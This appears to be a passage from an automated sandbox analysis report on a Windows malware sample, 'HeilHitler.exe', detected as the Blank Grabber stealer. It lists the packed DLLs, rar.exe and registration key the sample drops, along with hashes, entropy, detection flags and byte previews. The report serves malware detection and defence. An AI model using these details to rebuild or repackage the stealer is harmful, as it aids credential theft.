                                                                                                                                                                                                                                          Preview:PK........R.bY.w.p...p.......stub-o.pyco.......-.&g.........................@...sl...e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.d.d...Z.d.Z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e...Z.z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e...........pie.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............d.....W.nA..e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d...............y.......Y.n.w.G.d.d...d...Z.d.S.)....b....a....s....e....6....4.....r.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI74322\libcrypto-1_1.dll

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1189728
                                                                                                                                                                                                                                          Entropy (8bit):7.945107908450931
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24576:jffQrZJIe6/4gho5HE1F03fkOyUU/BtSIgA0ft+rBFOWRIQ6sCY51CPwDv3uFfJv:Tf8JWwgho5HL3fknPSIKorCU1CPwDv3a
                                                                                                                                                                                                                                          MD5:DAA2EED9DCEAFAEF826557FF8A754204
                                                                                                                                                                                                                                          SHA1:27D668AF7015843104AA5C20EC6BBD30F673E901
                                                                                                                                                                                                                                          SHA-256:4DAB915333D42F071FE466DF5578FD98F38F9E0EFA6D9355E9B4445FFA1CA914
                                                                                                                                                                                                                                          SHA-512:7044715550B7098277A015219688C7E7A481A60E4D29F5F6558B10C7AC29195C6D5377DC234DA57D9DEF0C217BB3D7FECA332A64D632CA105503849F15E057EA
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2..3...2..3...2..3...2...2...2L.3...2..3...2..3.2..3...2..p2...2..3...2Rich...2........................PE..d...m..b.........." ... .........@%.025..P%..................................P7...........`......................................... H5......C5.h....@5......`2.............H7......................................=5.@...........................................UPX0.....@%.............................UPX1.........P%.....................@....rsrc........@5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI74322\libffi-7.dll

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):24088
                                                                                                                                                                                                                                          Entropy (8bit):7.527291720504194
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:hRZBxuj5W4IBzuU2CUvOEvba4Za7gJXkrZRCXEpnYPLxDG4y80uzFLhHj:rwlGuUm2Evb1p07pWDG4yKRF
                                                                                                                                                                                                                                          MD5:6F818913FAFE8E4DF7FEDC46131F201F
                                                                                                                                                                                                                                          SHA1:BBB7BA3EDBD4783F7F973D97B0B568CC69CADAC5
                                                                                                                                                                                                                                          SHA-256:3F94EE4F23F6C7702AB0CC12995A6457BF22183FA828C30CC12288ADF153AE56
                                                                                                                                                                                                                                          SHA-512:5473FE57DC40AF44EDB4F8A7EFD68C512784649D51B2045D570C7E49399990285B59CFA6BCD25EF1316E0A073EA2A89FE46BE3BFC33F05E3333037A1FD3A6639
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....@................................................................`.........................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI74322\libssl-1_1.dll

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):208224
                                                                                                                                                                                                                                          Entropy (8bit):7.9214932539909775
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:5SI3oPlWLlPVVc5MpJa1pOjJnnioIZW8/Qf6bRXGKrs8qJjueW1LR/oSB6hetz:EIek5VC0FiHof6Z1rgJ63R/oS3
                                                                                                                                                                                                                                          MD5:EAC369B3FDE5C6E8955BD0B8E31D0830
                                                                                                                                                                                                                                          SHA1:4BF77158C18FE3A290E44ABD2AC1834675DE66B4
                                                                                                                                                                                                                                          SHA-256:60771FB23EE37B4414D364E6477490324F142A907308A691F3DD88DC25E38D6C
                                                                                                                                                                                                                                          SHA-512:C51F05D26FDA5E995FE6763877D4FCDB89CD92EF2D6EE997E49CC1EE7A77146669D26EC00AD76F940EF55ADAE82921DEDE42E55F51BD10D1283ECFE7C5009778
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.p*..p*..p*......p*...+..p*.\.+..p*.../..p*......p*...)..p*...+..p*..p+.iq*......p*...*..p*.....p*...(..p*.Rich.p*.........PE..d......b.........." ... .....P...`..@....p................................................`..........................................6..4@...3.......0...........M...........v......................................@%..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI74322\python310.dll

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1513336
                                                                                                                                                                                                                                          Entropy (8bit):7.991995760990047
                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                          SSDEEP:24576:Umhx0O5yMVUEV51zVZ/7KqaI0jVSn/OCNYLfUehwHqDdt9OJzoCr2TAY/f+TNX59:UmT0OjUK51xZ/7s6GDwKDD9OJEwsAE2V
                                                                                                                                                                                                                                          MD5:178A0F45FDE7DB40C238F1340A0C0EC0
                                                                                                                                                                                                                                          SHA1:DCD2D3D14E06DA3E8D7DC91A69B5FD785768B5FE
                                                                                                                                                                                                                                          SHA-256:9FCB5AD15BD33DD72122A171A5D950E8E47CEDA09372F25DF828010CDE24B8ED
                                                                                                                                                                                                                                          SHA-512:4B790046787E57B9414A796838A026B1530F497A75C8E62D62B56F8C16A0CBEDBEFAD3D4BE957BC18379F64374D8D3BF62D3C64B53476C7C5005A7355ACD2CEE
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R..R..R...S..R......R...W..R...V..R...Q..R.....R.K.S..R..S..R.'._.X.R.'.R..R.'....R.'.P..R.Rich..R.........PE..d......c.........." ...". ......../...E.../...................................F...........`...........................................F.......F.d.....F.......B...............F.......................................E.@...........................................UPX0....../.............................UPX1..... ..../.....................@....rsrc.........F.....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):630736
                                                                                                                                                                                                                                          Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                                          MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                          SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                          SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                          SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI74322\rarreg.key

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):456
                                                                                                                                                                                                                                          Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                          MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                          SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                          SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                                          SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                                          Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI74322\select.pyd

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):24952
                                                                                                                                                                                                                                          Entropy (8bit):7.392326214954849
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:+m71gl6dfHKsh8Za7gJXpDCI77G26IIYiSy1pCQ0AA7Pxh8E9VF0Nym5ty:11gl65HKNp5DCI77G2WYiSyv87PxWEgC
                                                                                                                                                                                                                                          MD5:666358E0D7752530FC4E074ED7E10E62
                                                                                                                                                                                                                                          SHA1:B9C6215821F5122C5176CE3CF6658C28C22D46BA
                                                                                                                                                                                                                                          SHA-256:6615C62FA010BFBA5527F5DA8AF97313A1AF986F8564277222A72A1731248841
                                                                                                                                                                                                                                          SHA-512:1D3D35C095892562DDD2868FBD08473E48B3BB0CB64EF9CCC5550A06C88DDA0D82383A1316B6C5584A49CA28ED1EF1E5CA94EC699A423A001CCD952BD6BD553D
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........].t.<r'.<r'.<r'.D.'.<r'.@s&.<r'.@w&.<r'.@v&.<r'.@q&.<r'i@s&.<r'.<s'.<r'.Ns&.<r'i@.&.<r'i@r&.<r'i@.'.<r'i@p&.<r'Rich.<r'........PE..d...&..c.........." ...".0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI74322\sqlite3.dll

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):623480
                                                                                                                                                                                                                                          Entropy (8bit):7.993502110233887
                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                          SSDEEP:12288:IZNIrMyJHzTarSwdWd5Xhm/27cz5hQYuHDiL1IcUq4P8ryHn5+8ybL:YNPsHzTaWwdS5xV70QYMDiCc34e8nI82
                                                                                                                                                                                                                                          MD5:BD2819965B59F015EC4233BE2C06F0C1
                                                                                                                                                                                                                                          SHA1:CFF965068F1659D77BE6F4942CA1ADA3575CA6E2
                                                                                                                                                                                                                                          SHA-256:AB072D20CEE82AE925DAE78FD41CAE7CD6257D14FD867996382A69592091D8EC
                                                                                                                                                                                                                                          SHA-512:F7758BD71D2AD236BF3220DB0AD26F3866D9977EAB311A5912F6E079B59FA918735C852DE6DBF7B5FEE9E04124BC0CD438C4C71EDC0C04309330108BA0085D59
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......CG;..&U..&U..&U..^..&U.HZT..&U.HZP..&U.HZQ..&U.HZV..&U..TT..&U..&T..&U..Z]..&U..ZU..&U..Z...&U..ZW..&U.Rich.&U.................PE..d...X..c.........." ...".0...0............................................................`.............................................d"..................................x...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc....0...........,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI74322\unicodedata.pyd

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):294784
                                                                                                                                                                                                                                          Entropy (8bit):7.987175768019268
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:PudZUEjoXwDrGv4qJBd4R0u3FIp6O4LMHS+OsfW/+vzoFZ:EGEjyirGd+f3FIp7eMHS+CUUr
                                                                                                                                                                                                                                          MD5:7A462A10AA1495CEF8BFCA406FB3637E
                                                                                                                                                                                                                                          SHA1:6DCBD46198B89EF3007C76DEB42AB10BA4C4CF40
                                                                                                                                                                                                                                          SHA-256:459BCA991FCB88082D49D22CC6EBFFE37381A5BD3EFCC77C5A52F7A4BB3184C0
                                                                                                                                                                                                                                          SHA-512:D2B7C6997B4BD390257880A6F3336E88D1DD7159049811F8D7C54E3623E9B033E18E8922422869C81DE72FC8C10890C173D8A958D192DD03BFC57CFFAEA1AC7B
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t..t..t..}...r..;...v..;...y..;...|..;...w.....w......v..t..%.....u.....u...y.u.....u..Richt..........PE..d...(..c.........." ...".P..........@V... ................................................`..........................................{..X....y.......p..........<............{......................................@b..@...........................................UPX0....................................UPX1.....P... ...D..................@....rsrc........p.......H..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_03x3bieo.s4l.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11vccslk.o4c.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1u2kkc4u.yhx.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34dx335j.fod.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ac0brka3.uft.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_clazwyb3.q2y.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d15ijqbh.cw4.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dfapl5q3.ke0.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fenpb0kj.101.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
